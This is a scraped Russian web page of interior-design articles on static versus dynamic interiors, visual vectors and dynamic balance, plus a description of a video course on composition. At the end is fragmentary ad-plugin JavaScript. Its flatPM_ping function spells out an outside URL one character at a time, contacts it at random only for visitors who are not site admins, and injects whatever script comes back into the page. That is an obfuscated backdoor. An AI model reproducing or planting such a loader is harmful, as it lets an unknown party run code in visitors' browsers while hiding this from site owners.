76 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Динамика в интерьере

Физика интерьера квартиры в статике и динамике

Понятия статики и динамики интерьера

Когда человек приходит домой, он должен чувствовать умиротворение и покой, желание расслабиться, подремать, а в каких-то квартирах и наоборот, сразу взбодриться, даже если до этого зевали, и в этот момент появляется энергия и желание повеселиться. Не всегда причиной тому является темперамент. Многое зависит от интерьера. А конкретно от того является ли он статичным или динамичным. Понятия статики и динамики противоположны по значению, но не взаимоисключающи. Динамика предполагает скорость, напор, вихрь, возбуждение. Статика располагает к умиротворению, спокойствию, размышлениям. И, однако, одно без другого немыслимо.

Что вам ближе равновесие или энергия

Загляните внутрь себя – что вам ближе, что вам свойственно? Может, вы стремитесь к душевному равновесию, любите покой, уединение, вам нравится философствовать? Стоит отдать предпочтение статичному интерьеру. Если вы непоседа, душа компании, сгусток эмоций — выбирите интерьер под себя, пусть он будет динамичным и искрится энергией. Это не так уж сложно, есть несколько приемов, которые помогут вам в этом.

Статический интерьер

Что характерно для статики? Неподвижность. Добиться такого эффекта в дизайне квартиры нам помогает разделение поверхности по горизонтали и вертикали, и самый простой вариант использовать обои с клеточным рисунком или в полоску. Никаких наклонных линий и поверхностей, кругом должна царить симметрия – в расстановке мебели, в расположении ковра на полу, картины следует развесить на одном уровне, они должны быть одинакового размера и желательно одной тематики. Статика не терпит хаоса. Пусть кругом будет много мягких декоративных элементов – подушки, пуфики, мягкие портьеры, льняные скатерти, все это создает умиротворенность и способствует статичности при восприятии помещения. Цвета, конечно, лучше выбирать пастельные теплые.

Динамический интерьер

Динамика есть движение. Добиться этого в квартире можно, используя наклонные или ломаные линии при создании обстановки, острые или тупые углы. Асимметрия и диагонали всегда сопутствуют динамике. Если интерьер оформлен картинами, нужно развесить их на разных уровнях, они непременно должны быть разных размеров и цветовых оттенков. Абстракции придутся как нельзя кстати. Отлично подчеркнет подвижность обстановки мебель нестандартной формы, дизайнерские новинки. Элементы декора хаотичны, притягивают взгляд, побуждают к действию. Цветовое оформление должно быть ярким, энергичным, кричащим, контрасты так же подчеркнут динамику окружения. Уместны будут стеклянные и блестящие хромированные поверхности. Для декора лучше использовать ткани гладкие, атласные, воздушные. Чаще всего динамический интерьер квартиры подчинен какой-то идее, например, «спираль», «стремление», «взрыв».

Сравнение статичного и динамичного интерьера

Нельзя считать статичный интерьер скучным и однообразным, а динамичный буйным и безбашенным. Статика рассудительна, подчеркивает статус хозяина, самодостаточность его личности. Динамика может говорить о целеустремленности, оптимизме, энергичности владельца.

Применение статичного и динамичного интерьера

Статичными чаще всего делают классические интерьеры, а динамичными модерновые, современные. Но грамотный дизайнер может внести звонкие подвижные ноты в статичную обстановку, а динамичную уравновесить спокойными симметричными деталями.

Секреты дизайна. Динамика и динамическое равновесие

Нам, современным людям, кажется, что мы знаем всё. Это предыдущие поколения удивлялись молекулам, а нам уже и атомов мало. Но вот парадокс, есть секреты о которых люди предыдущих поколений знали, а мы не можем их разгадать. Например, секреты японских мечей. Мы исследовали как устроены мечи и разобрали их до атомов, но повторить — не смогли. Потому что главные секреты кроются в мелочах о которых знали мастера и сохранили в тайне.

Свои секреты есть и в дизайне, и они также кроются в мелочах. Но, эти мелочи составляют основу многих дизайнерских шедевров, как древних так и современных. О нескольких секретах расскажем в этой статье — о динамике, о визуальном векторе и о динамическом равновесии. И поскольку наш блог о дизайне интерьеров, то на интерьерах остановимся детальнее.

Что такое динамика, визуальный вектор и динамическое равновесие в дизайне

Динамика и визуальный вектор

Сначала, разберемся с определением, что такое динамика и визуальный вектор в дизайне.

Динамика в дизайне — визуальное ощущение движения, которое создается элементами дизайна: формами, рисунками, визуальными эффектами. Визуальное ощущение означает, что движение подразумевается, а физического перемещения не происходит. Когда ощущение движение направлено в определённую сторону, то оно образует визуальный вектор.

При создании этой статьи понадобилось ещё одно разделение определения динамики — динамика визуальная и динамика визуально-чувственная, для простого и понятного объяснения этого эффекта. Если вам наше объяснение понравится, то считайте это авторством.

Динамика визуальная. Образуется движением взгляда при рассматривании чего либо.

Визуальные восприятия у людей разные и они зависят от индивидуальностей человека и традиционности. Например, при визуальном восприятия динамики у европейцев, традиционным считается, движение взгляда слева направо, при рассматривании рисунков или объектов. Такой порядок восприятие происходит от привычного движения взгляда при чтении. Но, человек, который традиционно читает справа налево воспримет по-другому.

Вертикальные и горизонтальные линии, и предметы строгих форм, образуют статичный вид без динамики и визуального вектора. При рассматривании взгляд останавливается или перескакивает на другой объект:

Наклонные и волнистые линии — создают слабое или первичное ощущение динамики. При рассматривании взгляд легче перемещается и скользит по линиям:

Динамику можно усилить, а визуальный вектор изменить. Если над наклонной линией разместить шар, то, в естественном визуальном восприятии, он будет скатываться, что усилит направление вектора вниз. Подъем шара вверх визуально не воспринимается — противоестественно, поэтому, направление вектора на рисунке справа меняется:

Динамика визуально-чувственная. Чувственная динамика образовывается из элементов, которые не имеют сильных визуальных направлений, но подразумевают их.

К визуально-чувственному динамическому элементу относится взгляд. Направление взгляда создаёт визуальный вектор:

Рисунки и формы имитирующие движение и направление движения создают сильный визуальный вектор:

Вертикальный прямоугольный столб — статичный элемент, но если, на него надеть крону и сделать похожим на дерево, то образуется чувственный визуальный вектор, который направит нас вверх, как и растёт дерево в природе:

Визуально-чувственную динамику и визуальный вектор создают рисунки или элементы, которые в естественном состоянии создают направленное движение: вода стекает вниз, огонь горит вверх, дым стремится вверх.

Задача динамики и визуальных векторов — направить взгляд и создать визуальное восприятие направленного движения.

Динамическое равновесие

Два противоположных визуальных вектора создают динамическое равновесие. Равновесие может быть в равной динамике или с преобладанием одного из векторов:

Динамическое равновесие создает гармоничность в общей композиции.

Тренировка

Закрепим знания. Посмотрите где на картинках: статика, слабая динамика, сильная динамика, равновесие — и, какой визуальный вектор создаёт каждый отдельный рисунок:

Динамика и эмоциональное восприятие

Есть теория восприятия динамических элементов и визуальных векторов по матрице эмоций. Матрица основана на ассоциативности нашего восприятия, похожим на двумерное пространство с графиком состоящим из шкал: времени и эмоций.

Время отображается временной горизонтальной шкалой, условной осью Х. Настоящее время — центр и условный нуль; шкала слева от нуля — это прошлое; шкала справа — это будущее.

Эмоции отображаются вертикальной шкалой, условной осью Y. Где, нейтральные эмоции — условный нуль, выше нуля — положительные эмоции, ниже нуля отрицательные.

Соединив вместе шкалу времени и эмоций, мы получим эмоциональную матрицу. Где вектор направленный справа вверх — абсолютный оптимизм, ассоциируется с уверенностью лучшего будущего. Вектор направленный влево вниз — абсолютный пессимизм, ассоциируется с трагическими воспоминаниями. Идея восприятия по эмоциональной матрице заложена во многих художественных произведениях, фотографиях, рисунках. Эмоциональное восприятие можно усилить или ослабить, если осветлить или затемнить соответствующие участки матрицы в композиции. На примере картины сильный визуальный вектор создаёт взгляд девушки, обращённый в прошлое, возможно, приятным воспоминаниям и осветлённая дальняя перспектива за открытой дверью. Слабый вектор — линии проекции, которые направляют взгляд к центру картины:

Картина художника Григория Чайникова

Правило эмоционального восприятия по матрице — не абсолютная истина, а условность. Если ему следовать слишком буквально, то художественная или интерьерная композиция получиться слабая, как заезженный клипарт об успешных продажах.

В интерьерах, как пространстве для жизни, управлять общим эмоциональным фоном сложнее, но, правильно подобранные и объединённые элементы дизайна: обои, панно, фотографии, картины, декоры — помогут в этом.

Как применяют динамику визуальные векторы и динамическое равновесие в дизайне интерьеров

В интерьерном дизайне динамику и визуальные векторы используют в соответствии с практическими и эстетическими целями. Практические цели связаны с удобством для человека в помещении — создать навигацию, обозначить специфику или функционал помещения. Эстетические цели связаны с визуальным восприятием — увеличить или уменьшить пространство, создать акценты, визуально соединить разрозненны элементы, разнообразить композицию.

Навигация и функционал помещения

В общественных интерьерах навигация обязательный атрибут и некоторые из навигационных элементов нормативны. Но, норматив можно усилить, или создать дополнительную навигацию, которая создаст удобство или подведет к важным или другим по функционалу участкам помещения в интерьере. На примере, симметричные женские профили и взгляды обращенные в центр, создают точную и понятную навигацию:

На фото: Дизайн-проект от STUDIOFORMS studioforms.by

Создать акценты

Создать акцент — работа визуального вектора. Визуальный вектор переместит взгляд на акцентный элемент, а при взаимодействии с встречным визуальным вектором, сделает акцент явным. На примере, ретро рисунки с равновесной динамикой создают акцент на телевизоре:

На фото: Дизайн-проект от STUDIOFORMS studioforms.by

Визуально соединить разрозненны элементы

Чтобы все присутствующие в интерьеры элементы не жили отдельной жизнью, их можно визуально соединить. Работает это так — визуальный вектор направляет взгляд от детали к детали. Динамика в элементах поможет взгляду скользить, а не перескакивать от элемента к элементу. Динамическое равновесие создаст впечатление продуманности, что всё здесь на своих местах:

Примеры декоров для с визуальным вектором и динамикой. Аисты — создают вектор вправо, кошка на светильнике — вектор влево и вниз, а взгляд человека — вверх на эти строчки:

Увеличить или уменьшить пространство

Динамика и визуальный вектор могут создавать визуальные иллюзии. Вектор стремящийся вверх визуально увеличит высоту, вектор в стороны увеличит ширину пространства:

На фото: Обои BN International коллекция Interior Affairs магазин oboivdom.by

Разнообразить композицию

Статичность и унылость в интерьере победит динамика. Наклонные, волнистые и изогнутые линии снимут статику. Динамичные элементы создадут сюжеты и ритм. А соблюдаемое равновесие в динамичных элементах создаст впечатление гармонии и правильности без визуальных перекосов. Сделать динамику тонкой, малозаметной и продуманной помогут визуально-чувственные элементы, как на примере, где визуальный вектор стремящихся вверх цветов уравновешен вектором вниз похожей на падающую воду шторой :

На фото: Обои Atlas коллекция Temtation магазин oboivdom.by

Дополнительные эффекты и идеи

Динамикой можно создавать смысловые акценты как в анимационном фильме: “Приключения Паддингтона” — панно с изображением дерева и динамика направления лестницы использовались как смысловое направление — важные действия происходят там — наверху, плюс изгиб дерева повторяет изгиб винтовой лестницы, что создаёт симметричность:

Зрительный вектор вверх создаст впечатление превосходства и статуса. Это визуальное свойство использовали ещё при украшении урок и сводов переплетающимися рисунками, стремящимися вверх, чтобы создать впечатление величественности. Верхний вектор можно использовать в декоре кабинетов или гостинной:

На фото: Обои 1838 Wallcoverings коллекция Rosemore магазин oboivdom.by

В итоге

Для тех кто дочитал до этих строк. Если вы осознали, что теперь понимаете в дизайне больше, значит мы старались не зря. А если, в результате, появились идеи, то для нас это уже счастье.

Для тех кто сейчас не озадачен преображением помещения. То, для вас бонусом ещё один секрет — эффекты динамики, визуального вектора и динамического равновесия работают в любом виде дизайна: графическом дизайне, веб-дизайне, дизайне полиграфии.

Статья — не истина последней инстанции. Многие взгляды и идеи авторские и созданы на основании знаний других людей и собственного опыта автора.

Динамика в интерьере

Замечали ли вы, что приходя в гости к одним людям, вы чувствуете себя расслабленным и хотите вздремнуть, а к другим – не прочь потанцевать и посмеяться? Не всегда это зависит от темперамента хозяев. Интерьер влияет на наше состояние очень сильно.

Статика и динамика – два противоположных понятия. Динамика – это скорость, эмоции, возбуждение. Статика – это умиротворенность, спокойствие, размышления. Не любите сидеть на месте – выбирайте динамику в интерьере. Ищите душевное равновесие после рабочего дня – выбирайте статику. Динамику или статику в интерьере создать не так уж сложно, если руководствоваться некоторыми принципами.

Статика. Самая главная характеристика статики – неподвижность. Для статики характерно членение поверхностей по горизонтали и вертикали. Никаких острых углов и наклонных линий. Отлично уравновешивает интерьер симметрия. Например, равномерно распределенная по комнате мебель (два кресла и диван между ними), ковер в центре комнаты (со спокойным симметричным узором), развешенные на одном уровне картины (похожие по сюжету и цветовой гамме, одинаковые по размеру). С помощью спокойного орнамента можно подчеркнуть статику. Используются обои, покрывала или шторы с равномерным рисунком. Отлично подойдут растительные орнаменты, клетка, горизонтальная или вертикальная полоска. Подчеркнет статическое направление наличие множества мягких элементов (подушки на диване, уютные кресла, пуфики, банкетки, ковры, портьеры из мягкой нежной ткани, скатерти, текстильные обои). Мебель подойдет максимально устойчивая, возможно, заниженная. Статический интерьер чаще выполнен в нейтральных пастельных тонах, мебель обычно стандартных цветов (итальянский орех, вишня, бук, ольха, дуб). Глянцевые и хромированные поверхности, скорее всего, будут не уместны, а вот матовые и приятные на ощупь – придутся кстати.

Динамика. Главное определение динамики – движение. Для динамики характерны кривые или наклонные линии, а также острые или тупые углы. Диагонали и асимметрия – основные динамические приемы. Если присутствуют картины — они, либо разного размера, либо развешены на разных уровнях, либо разные по цветовой гамме. Отлично впишется абстракция или стилизация. Приветствуется мебель нестандартной формы, новинки в области дизайна. Нередко можно обнаружить какой-либо динамичный ритм в оформлении стен, полов, потолков. Декор играет большую роль в формировании динамики. Декоративные элементы здесь хаотичны, привлекают внимание, пробуждают эмоции. Можно использовать асимметричные шторы из нескольких видов тканей. Динамика интерьера часто подчеркнута энергичным цветовым оформлением. Уместны будут яркие кричащие цвета, контрастные сочетания. Мебель можно использовать любых оттенков, хорошо подойдут современные материалы с интересной текстурой и фактурой. Стеклянные и блестящие поверхности подчеркнут динамику. Ткани лучше выбирать атласные, гладкие, прозрачные, воздушные. Обычно динамический интерьер несет в себе какую-либо идею, например, «взрыв», «возвышение», «стремление», «спираль», «направление» и др.

Ошибочно полагать, что статический интерьер скучен и непригляден. Статика может быть интересной, рассудительной, подчеркивать статус хозяина, характеризовать его как состоявшуюся личность. Динамику также нельзя однозначно трактовать как буйство и нестабильность. Динамичный интерьер может говорить о целеустремленности, жизнелюбии и оптимизме владельца. Можно сказать, что статика – это чаще классические интерьеры, а динамика – современные. Но и классика может быть динамичной – помпезной, веселой, эмоциональной. Например, классическая гостиная может быть оформлена как просторное место для приема гостей, с ритмичным паркетом и шторами с асимметричным ламбрекеном. Классический интерьер чаще стабилен и уравновешен, но грамотный дизайнер легко справится, если заказчик пожелает, чтобы классический интерьер был динамичным, воодушевлял и вдохновлял на какие-то поступки. Та же ситуация с современными стилями – чаще они динамичны, но при правильном подходе хай-тек, фьюжн, китч и другие стили могут быть вполне статичны. Вообще, интерьер – это искусство, каким бы ни был стиль. А искусство безгранично. Дизайнеры, декораторы и художники для того и нужны, чтобы творить, создавать «невозможное».

Композиция в дизайне интерьеров | Видео курс

Я раньше читала курс «Композиция в дизайне интерьеров» в Международной Школе Дизайна, и ко мне обратились две коллеги с просьбой прочитать его и для них. Данная информация будет полезна не только тем, кто собирается заниматься дизайном профессионально, но и всем, кто интересуется темой «дизайна интерьеров», как говорится, «для себя».

В нескольких видео я рассказываю базовые универсальные принципы построения художественной композиции с примерами интерьеров, а также с типичными ошибками композиции. Основная цель — научиться приемам, которые лежат в основе гармоничного интерьера еще до выбора стиля или подборки конкретных предметов.

Часть 1

В этом видео мы обсуждаем, что такое композиция, какие формы она может принимать в различных сферах деятельности человека. В основном речь пойдет о разных видах искусства и об универсальности базовых принципов композиции. В процессе создания произведения человек ищет оптимальную форму для выражения своей идеи, в интерьере дизайнер также рассматривает различные варианты, стремясь сбалансировать целое. Для этого важно, с одной стороны, объединять элементы в группы (это способствует целостности), с другой стороны,- выделять отдельные элементы (что способствует разнообразию и облегчает восприятие композиции).

Далее мы рассматриваем, что объединение предметов в группы происходит на основе их характерных признаков, таких как форма, текстура, фактура, цвет и отдельные его характеристики, направленность предмета. Разбираем конкретные примеры.

Часть 2

Это видео посвящено тому, как именно мы выделяем отдельные элементы из общей массы. Как выделить из общей картины основные, второстепенные и третьестепенные элементы, как установить между ними иерархию и сделать так, чтобы общий вид интерьера при этом не напоминал сборную солянку. Понятие ритма и метра в интерьере. Проще всего создать метр из повторения одинаковых предметов: три вазы, пять одинаковых полос на полу, и так далее. Почему иногда они помогают, а иногда создают монотонность? А в некоторых случаях клиенты вообще не считывают, что вообще-то вы тут задумали сложную ритмическую композицию.

Статья про особняк Смирнова, упоминаемая в видео здесь

Часть 3

Понятие пропорция как соотношения частей. Прежде всего оно относится к размерам предметов, которые зритель невольно сравнивает. Но также можно говорить о пропорциях, говоря о частях одного предмета, о пропорциях как о соотношении любой из характеристик, рассмотренных в первой части. Например, вы подобрали предметы, объединили их в группы по ряду признаков, выделили доминанты. А интерьер все равно не клеиться. Это может происходить из-за слишком большой или наоборот слишком маленькой разницы в масштабах. Конечно, разговор о пропорциях не ограничивается золотым сечением, но тогда о них надо делать отдельный курс. 🙂

Правильного баланса в композиции можно достичь за счет симметрии, асимметрии и дисимметрии, мы подробно обсуждаем плюсы и минусы каждого подхода, различные виды симметрии, асимметрию как основу динамики и эмоциональности в композиции.

Часть 4

В этой части пойдет более подробный разговор про доминанты и акценты, про пропорции и ритм и области основного интереса. Разбираются примеры, как собрать интерьер вокруг одного объекта. Как управлять взглядом человека, находящегося в интерьере, управлять его вниманием при помощи композиции. Как привлекать внимание к предметам при помощи подсветки.

Часть 5

Данная часть посвящена принципам композиции – пропорциям, симметрии, равновесию. Разбираются виды композиции – линейная, диагональная, открытая, замкнутая, круговая. Построение композиции по Египетскому треугольнику, Золотому сечению, третям. Развеска картин в интерьере, согласно правилами композиции. Соотношение частей композиции. Продолжается разговор про симметрию и асимметрию. Движение в интерьере – какими средствами показать динамику и статику. Какими средствами получается равновесие объектов в композиции.

В этой части упоминаются:

Статья: «Ковер в интерьере – тренд на возврат советских ковров» читать

Статья: «Зачем нужно соблюдать оси в интерьере» читать

Статья: «Дизайн-экскурсия в Гатчину» читать

Мой дипломный проект в Школе «Дитали» Смотреть проект

Про орнамент в интерьере:
  1. Выступление на тему «Как сочетать орнамент в интерьере» Смотреть
  2. Выступление на тему «Магия орнамента» Смотреть

Надеюсь, эти пояснения были вам полезны, так как композиции не всегда уделяется должное внимание в преподавании интерьерного дизайна, а между тем, она лежит в основе всех принимаемых дизайнером решений.

Понравилась статья? — Поделитесь в соцсетях или оставьте комментарий

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика